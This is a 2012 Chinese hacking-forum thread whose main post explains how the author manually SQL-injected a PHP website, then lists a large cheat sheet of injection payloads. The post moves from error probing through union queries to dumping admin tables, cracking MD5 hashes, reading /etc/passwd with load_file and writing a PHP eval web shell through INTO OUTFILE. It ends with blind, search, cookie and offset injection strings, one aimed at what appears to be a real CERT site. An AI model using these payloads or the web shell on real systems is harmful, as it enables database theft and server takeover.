找回密码
 立即注册
查看: 3743|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~5 Y: m3 F1 j  E! B7 Y
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
5 ]! L' z# J( c0 F5 D我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
5 \( g7 b- Z$ @& s$ e如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
. X6 i1 ^1 g$ F8 j1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
) }  V% n6 C# E2 L这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
% [4 N6 t3 A  V! WWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in9 P2 v! d( {2 m" c
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入  m! m2 \, L3 n: t- b
                        
% e" t2 W- w( W# A3 Z2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
2 h3 `1 ]& i2 @8 R5 p1 g4 t# K3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意. o! u6 t/ S- o- b) o7 O1 L
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息* ]) S1 Z0 i& X+ S& \7 R
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。/ Q/ ?% x: A( z& r4 o: {% Q
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,2 [7 Y: Y1 B9 v' T$ z# a, P
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。4 @  \% T! G, G8 a
我就用的是第二个思路,5 W! f/ Z" y% P' o  `$ Q4 o
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
  H! z) X# t$ ]. m, K9 w6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,* Y& y! C5 ^8 ^  |: |' q( O
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
9 o/ Y! U2 w, ?) \注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
& ?+ p  D' ]$ a7 J0 r: s/ i7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????' z& h  r. p; k- P" D1 Z5 F
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....) F& `% I$ U: v" H. c5 b
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
- E; ^% d& q6 Z* f4 }2 R然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
* P) d  @; d' K0 ^* `7 u调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
, a' w: n) G+ T  i- A5 N下面是一些很普遍注入方式资料:
, q! ^5 W) W( E; ?' z! P注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
& z; N7 a$ `, j* Y拆半法
- r9 a8 @6 Q# r3 Y######################################
  D# o) N, H. I2 e" u/ j; Vand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
7 d7 @& D7 A3 u9 v' W: hand exists (select * from admin), V* |6 R- a9 S3 \" P8 V3 m
and exists(select id from admin)
3 q  p+ y3 C5 M' h6 Band exists(select id from admin where id=1)- }0 s9 F8 e: m9 ^# n5 R* ~: O
and exists(select id from admin where id>1)
% K+ s9 i* v% }* u& b- O然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
% W4 [/ ?1 |" d8 eand exists (select username from admin)
4 u7 Q1 Y2 l9 ?: ~and exists (select password from admin)( G7 S) r: T, |
and exists (select id from admin where len(username)<10 and id=1): N; f+ D( j# u- T& y$ T
and exists (select id from admin where len(username)>5 and id=1)
! N" `4 s0 S/ M, R8 w) qand exists (select id from admin where len(username)=6 and id=1)  ]+ h, i1 ]: f# \
and exists (select id from admin where len(password)<10 and id=1)
6 l; H8 F' k! _8 p* xand exists (select id from admin where len(password)>5 and id=1)) y2 C: r( l0 c: w5 |* a
and exists (select id from admin where len(password)=7 and id=1)
; J. p( D7 q% M3 l5 D- m$ y6 O/ sand (select top 1 asc(mid(username,1,1)) from admin)=97
; f9 o, Z: {( }# a# V返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
: }1 N- a* ^" m/ x0 T! ?4 b猜第二位把username,1,1改成username,2,1就可以了。
# q$ h# O. b$ N! h; y3 }9 F猜密码把username改成password就OK了# D# M; L+ A/ ~- [# z( X4 R
##################################################
; O7 b! H- Z) _5 h2 _  ^搜索型注入& k2 s1 L. o; N
##################################: x8 \* w2 P0 Q# p) L* r4 _
%' and 1=1 and '%'='
( y2 R+ V) f% z! E%' and exists (select * from admin) and '%'='' X% C$ g' o- s4 B& v7 {8 q+ M
%' and exists(select id from admin where id=1) and '%'='# D; x) i) j* b1 I; G  k
%' and exists (select id from admin where len(username)<10 and id=1) and '%'=', O+ X6 I" L: q2 U
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
% E6 z# G( s7 y+ Y%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='! G# \; c/ d: h# M2 _( X. O8 ~
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='' P* c, l8 v. x" c5 B/ Y
对于MSSQL数据库,后面可以吧 and '%'='换成--
6 ^! p. f. y) V/ P8 x' }& {5 }还有一点搜索型注入也可以使用union语句。
& u# g: w1 c1 n! ~) G; J( p- V########################################################
3 O% f0 D( E0 ]联合查询。( E4 k2 q  \3 G+ ~) U5 s
#####################################0 c& j. H+ `$ c/ M
order by 10; x" ], ]& A, g2 ?, e0 J* @$ c. d
and 1=2 union select 1,2,3,4,5,6,7,8,9,10  ^" V  J- A( p# G
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
. v0 i  O+ E3 |" Yand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
4 X) Z9 t6 Y0 {9 q( u很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)  G4 ^* u5 Y' A( m4 A
###################################
- W2 H1 @3 R6 z0 V0 ^' rcookie注入2 s5 O' V& K6 k6 Q# k
###############################* P) W; H% O6 ]( A. c3 J
http://www.******.com/shownews.asp?id=1279 v. J  g* i2 V2 b5 l3 l- _1 K
http://www.******.com/shownews.asp
5 [) Y5 ?0 o. X: [/ S: i$ Falert(="id="+escape("127"));
. G5 ^/ J' q+ Q7 `: Oalert(="id="+escape("127 and 1=1"));
5 g9 ~& F0 I' Malert(="id="+escape("127 order by 10"));
2 ~0 x4 N. {9 N# m" t. Xalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
" ~+ U1 J$ E( @  i* n! ^: galert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));) U/ E9 H0 Q% N( E# N
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。+ f: T& B* U; I- A4 ^% u) W
###################################
2 W% L! T2 v0 m/ V- v& o偏移注入' d: |0 r) y" m8 z5 f3 E
###########################################################: c3 p3 o' ^/ V( H- P' I+ \
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
+ D9 U& U: l$ I# p) U2 bunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin# Z* e% `( P. ~/ S5 U
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
; I- H7 p/ D. f& f  munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)9 G0 V  N. L2 Z& ?$ |1 M5 p
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id): Q' W: k( K8 t) x& b( g' F2 T
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)! F* {( ^: R& j, D3 m
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on1 W1 l! t' B: _. F3 {
a.id=d.id)
1 R) K+ W# s9 `4 J0 ~and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)7 j# ?& Y: `  ]9 J
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)   Z- v8 H( e' J6 u7 E' L$ B' P
  7 X( ^* k% Y4 U) D( ?* D5 c- e
============================================================================================================
+ E- @0 p0 |+ F+ s1.判断版本: g6 D" c; O1 Q& Z
and ord(mid(version(),1,1))>51) Y! j9 I1 P( {3 r' {/ E1 J2 R0 u
返回正常,说明大于4.0版本,支持ounion查询
% O/ N9 t. t/ j5 M' J9 V2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解# ^- v  g7 M& Q
and 2=4 union select 1,2,3,4,5,6,7,8,9--& d8 t% H; n1 B  U
3.查看数据库版本及当前用户,2 r! Q8 r% x8 N+ ~6 J
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
7 U8 p  [; A; }" E  d- f数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
) v+ z' C$ R% V8 R6 i+ ^1 b1 q4.判断有没有写权限7 w$ J/ H; J' a$ D( n! B
and (select count(*) from MySQL.user)>0--
/ ?. G( u, W5 O; x8 c5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1$ n. |& k/ Z1 {$ q
用不了这个命令,就学习土耳其黑客手法,如下% I' L7 {* A: V3 {+ I! k$ @& i& t
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
: Q2 M# {# s2 }8 R  t6.爆表,爆库2 q2 g( K+ Q& o  y, _5 Q5 E
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
9 N# {* D2 n0 y7 B7.爆列名,爆表
' s. v: }! p7 T, T8 D  Y1 iand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--" ^3 f! a& ?$ I& i8 @, j* H& Z
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。, g0 Y' g; Q" f, a' A% c7 T
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--/ L4 w& Y$ h+ e/ F$ F5 p" F
9.爆字段内容  b+ R3 w4 U7 I5 S0 j
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
' N. }( [* U  R7 L2 b+ k8 j% w( Dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表